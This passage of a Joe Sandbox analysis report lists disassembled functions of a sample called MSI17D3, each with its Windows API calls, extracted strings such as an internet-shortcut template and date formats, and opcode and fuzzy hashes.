Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 2f4133597a1ce30846ba01de9f2c6b891f23512276f67eb91d346551c95db12b
Instruction ID: 2b6b798370ada045519765d35f3d192a23ca554b6b97cea7ff87272d587d5325
Opcode Fuzzy Hash: 2f4133597a1ce30846ba01de9f2c6b891f23512276f67eb91d346551c95db12b
Instruction Fuzzy Hash: BEF08B363003445FCB245F36DC85A7E7B94FF807A8F05842CFA058BA80D2B1AD42DB50

Function 00CE7132 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00CE1C9A: EnterCriticalSection.KERNEL32(-00D0DE50,?,00CE3576,?,00D0A078,0000000C,00CE3841,?), ref: 00CE1CA9

EnumSystemLocalesW.KERNEL32(Function_00037125,00000001,00D0A1D8,0000000C,00CE7554,?), ref: 00CE716A

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: e985278ebba94df007aa11fa1180b9b3a6fdb9168b7dc581f31d799160424d36
Instruction ID: b3b2bba37a60e4ec14b875966316a39db6ea11620bf21889ae6fbbe82f0eee3e
Opcode Fuzzy Hash: e985278ebba94df007aa11fa1180b9b3a6fdb9168b7dc581f31d799160424d36
Instruction Fuzzy Hash: 09F03772A54340DFD700DF99E846B9C77F0FB48721F108A6AF519DB3A0DB754900AB61

Function 00CEE0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872

EnumSystemLocalesW.KERNEL32(00CEE01F,00000001,?,?,?,00CEE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CEE0FD

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7b1ec95fd08c56979fa8b08e2b03855a48bd6938baccb9dfa5e575e151184a12
Instruction ID: ca1b928ccbed7497038e99c58a95e0d67ef5a6e57dbd22f4c6d5213cb7f0b088
Opcode Fuzzy Hash: 7b1ec95fd08c56979fa8b08e2b03855a48bd6938baccb9dfa5e575e151184a12
Instruction Fuzzy Hash: D8F02B3A30034597CB04AF36DC4577E7F95EFC17A4F0B4068EB1A8B651C6729982E790

Function 00CD23F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00CD00E2,00000000,00000000,00000004,00CCED14,00000000,00000004,00CCF127,00000000,00000000), ref: 00CD2410

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: f40b0d3550a72510d6debf9c66784bc70ca22021c117f1b9e5bcb0d1461a71c1
Instruction ID: 29715194869f7cae7e5557b95e1e90878711cbaa4e3c47c6853df7a8880cff9e
Opcode Fuzzy Hash: f40b0d3550a72510d6debf9c66784bc70ca22021c117f1b9e5bcb0d1461a71c1
Instruction Fuzzy Hash: 40E0D832694104B6D7154BB99E1FFBE7698D711709F504552EE02D41D1DAA1CB10E161

Function 00CE76AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CE4E3F,?,20001004,00000000,00000002,?,?,00CE4441), ref: 00CE76E3

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: fb20c18d3661e4736057b9bb1e9d5f8c278698f5158bf7331f55bef77f647e09
Instruction ID: 5a87a69c16ef240afe0fe5e866fc94acc028474aa7ed06783b940f9a88d4db75
Opcode Fuzzy Hash: fb20c18d3661e4736057b9bb1e9d5f8c278698f5158bf7331f55bef77f647e09
Instruction Fuzzy Hash: BCE04F3250865DBBCF122F62DC09BAE7E2AEF44750F004210FD0565160CB318930EAD6

Function 00CD353F Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00CD3077), ref: 00CD3544

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 46112596f0b9b061bda7fce7588a6857482e1c6fb26d8822203db598512fcdef
Instruction ID: 7bc69bc3337b5ed47af49c5da81f9d0ca4d55e97199b062f98202a1d50c8926d
Opcode Fuzzy Hash: 46112596f0b9b061bda7fce7588a6857482e1c6fb26d8822203db598512fcdef
Instruction Fuzzy Hash:

Function 00CB2310 Relevance: 1.3, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0

GetProcessHeap.KERNEL32 ref: 00CB2365

Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
String ID:
API String ID: 325507722-0
Opcode ID: aef29a834446c2f8a543f0f81999cd2f28455973c6ef322b908e02cee94ba3ba
Instruction ID: 25cfbf2779fb6d471ec30b08c26485300f2a64cdf5e4092bd3898e3387563c51
Opcode Fuzzy Hash: aef29a834446c2f8a543f0f81999cd2f28455973c6ef322b908e02cee94ba3ba
Instruction Fuzzy Hash: BC2166B19023009FE320CF68F846B89B7B0E724320F804E69E529973E1D77259089B72

Function 00CE0A48 Relevance: .7, Instructions: 655COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction ID: f827cc7ceb59824260b41b64b26b1328cf1a0dc2f5a8fee847ff629b0420ad16
Opcode Fuzzy Hash: c8be701706672502347744ee385a29e4b982556497efb68b5e76dd04359ca494
Instruction Fuzzy Hash: 6232BE34A0025ACFCF28CF99C981ABEB7B5EF44304F294169DD55A7305D732AE96CB90

Function 00CE92A9 Relevance: .6, Instructions: 637COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da72f340f8633781a284650d735de528d123d501525ac7d49e7d5739ea58e31f
Instruction ID: f71ee3ab2b7e1c4157c02dfab241d555a205c2a0e75b9a9443f720ab97220117
Opcode Fuzzy Hash: da72f340f8633781a284650d735de528d123d501525ac7d49e7d5739ea58e31f
Instruction Fuzzy Hash: 1432F421D29F414DD7239635CC62339A249EFB73C4F15D737E82AB5AAAEB39C9834101

Function 00CDA915 Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d99448249c3579cd060ae9f9d35a25b12ac120889b42278f004e2f8fe372b77
Instruction ID: 4b3ded6ab9b1027d507aa4319b340feb3af001b44d78773cfdc4c7ef2e9548b7
Opcode Fuzzy Hash: 6d99448249c3579cd060ae9f9d35a25b12ac120889b42278f004e2f8fe372b77
Instruction Fuzzy Hash: 24E1AD706006058FCB24DF68C590ABEB7F2FF49310B254A5BD66A9B391D731EE42DB12

Function 00CDC2CA Relevance: .2, Instructions: 158COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction ID: 632b59effde8c8fe0228aa3eb501581fc1aebc9116dc21a894e04c7611820607
Opcode Fuzzy Hash: d45df35f10881d6221681adf7eefdf880ea19ec113d03b89221ba79bb02f15a8
Instruction Fuzzy Hash: FB516171E0021AAFDF14CF99C991AFEBBB2EF88310F198059E915AB341C7349E50DB91

Function 00CD4920 Relevance: .1, Instructions: 76COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: cb1ce539b9edd33e7400a3b4ceea402664e3e8304283383f2cbad3b2f037559a
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: D811C8B720118243D61CC62FD4F45B7E79DEBC632572D436BD3A18B758D232AA459600

Function 00CEAD78 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction ID: 59cf749247775bf762f70507f48b7f250362c81613e693b37bf25b1a847b42ca
Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
Instruction Fuzzy Hash: E7E08C729112B8EFCB25DB99C904A8AF3ECEB84F01B15059AF501D3500C270EF00EBD1

Function 00CE2DCC Relevance: .0, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction ID: d9b61487f3e69bec76c6a579d11b87f767393e07374035cbb1642abcf6d0c4d3
Opcode Fuzzy Hash: b3db29eff45ca403c5659c65b9b04778331e453842759ddf3eba89ef405327b8
Instruction Fuzzy Hash: 9FC08C34400E804ACE2989118EB13A83358B791782F80058DC6130BA46C51EBF83E601

Function 00CB6600 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 319filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 00CB667E
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66D7
LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66E2
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CB66FE
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB67DB
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB67E7
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00CF49E5), ref: 00CB682F
LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB684A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00CF49E5), ref: 00CB6867
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB6891
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00CB68D8
ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00CB692A
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CF49E5,000000FF), ref: 00CB695C

Strings

[InternetShortcut]URL=, xrefs: 00CB670A
URL Shortcut content:, xrefs: 00CB6875
-_.~!*'();:@&=+$,/?#[], xrefs: 00CB6757, 00CB676E
open, xrefs: 00CB68D1, 00CB68F0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
API String ID: 2199533872-3004881174
Opcode ID: b4d7bdc44e23b552bede6f37ff6810bfeac7b64b982e9d6cc80e84b311eb8d3f
Instruction ID: 645b7485ceea6386bc2a5ead099296cdb0f60151cb4199cd4d7fb6c4b7b6a0e3
Opcode Fuzzy Hash: b4d7bdc44e23b552bede6f37ff6810bfeac7b64b982e9d6cc80e84b311eb8d3f
Instruction Fuzzy Hash: 59B12771900249AFEB20DF64CC45FEFBBB9EF45700F144129E914AB2C1DB799A09C7A1

Function 00CD2B8C Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00D0DD3C,00000FA0,?,?,00CD2B6A), ref: 00CD2B98
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CD2B6A), ref: 00CD2BA3
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CD2B6A), ref: 00CD2BB4
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CD2BC6
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CD2BD4
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CD2B6A), ref: 00CD2BF7
DeleteCriticalSection.KERNEL32(00D0DD3C,00000007,?,?,00CD2B6A), ref: 00CD2C13
CloseHandle.KERNEL32(00000000,?,?,00CD2B6A), ref: 00CD2C23

Strings

kernel32.dll, xrefs: 00CD2BAF
WakeAllConditionVariable, xrefs: 00CD2BCC
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CD2B9E
SleepConditionVariableCS, xrefs: 00CD2BC0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 2309c86079a24ed1ac5ba8053f9a03287fcf210227abde755be651a0face31af
Instruction ID: 23561b1c2fca51f885b361c3b525e39bae1ed49d50ae1259d90e87c2faeac435
Opcode Fuzzy Hash: 2309c86079a24ed1ac5ba8053f9a03287fcf210227abde755be651a0face31af
Instruction Fuzzy Hash: 54015E71A45711ABE6215FB4AD09F7E3B699FA0B51B004923BA09D23A0DEB4C804D672

Function 00CD5CAF Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00CD5DAC
type_info::operator==.LIBVCRUNTIME ref: 00CD5DCE
___TypeMatch.LIBVCRUNTIME ref: 00CD5EDD
IsInExceptionSpec.LIBVCRUNTIME ref: 00CD5FAF
_UnwindNestedFrames.LIBCMT ref: 00CD6033
CallUnexpected.LIBVCRUNTIME ref: 00CD604E

Strings

csm, xrefs: 00CD5E05
csm, xrefs: 00CD5CEC
csm, xrefs: 00CD5D59

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 07665e5a2dd2e19dcd590f5befae35ea1d6411e58b94da93533edcc536f48f03
Instruction ID: 55007db8219c457fdf771e57efcbec99c4304b9db41544f563cf5cd498c4c921
Opcode Fuzzy Hash: 07665e5a2dd2e19dcd590f5befae35ea1d6411e58b94da93533edcc536f48f03
Instruction Fuzzy Hash: 51B18B71800609EFCF28DFA4C9819AEBBB5FF14310F14415BEA256B352D731EA52DBA1

Function 00CB4270 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,665E9022,?,?,?), ref: 00CB42D2
OpenProcess.KERNEL32(00000400,00000000,?,?,665E9022,?,?,?), ref: 00CB42F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4337
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4355
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4371
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4399
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43B5
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43D3
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB43EF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CloseHandle$Process$OpenTimes
String ID:
API String ID: 1711917922-0
Opcode ID: fd5aabc28cb10bf7b4c0c01fc61cbd9aee871cf3cc0738c71c5b7462f2b536c0
Instruction ID: 987b1359ca830748b0c9d0f95b90c2dbfd9e85cff695003e9781c71efbd777b5
Opcode Fuzzy Hash: fd5aabc28cb10bf7b4c0c01fc61cbd9aee871cf3cc0738c71c5b7462f2b536c0
Instruction Fuzzy Hash: 415148B0D05218EBDB14DF98D984BEEBBF4FF48714F284219E624B72D0C7745A058BA9

Function 00CCBBBD Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCBBC4

Part of subcall function 00CC254E: __EH_prolog3.LIBCMT ref: 00CC2555
Part of subcall function 00CC254E: std::_Lockit::_Lockit.LIBCPMT ref: 00CC255F
Part of subcall function 00CC254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC25D0

Strings

%m / %d / %y, xrefs: 00CCBCBB
%b %d %H : %M : %S %Y, xrefs: 00CCBE52
%H : %M, xrefs: 00CCBD03
%d / %m / %y, xrefs: 00CCBEFA
:AM:am:PM:pm, xrefs: 00CCBF2A
%H : %M : %S, xrefs: 00CCBD5D
%I : %M : %S %p, xrefs: 00CCBF1F

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
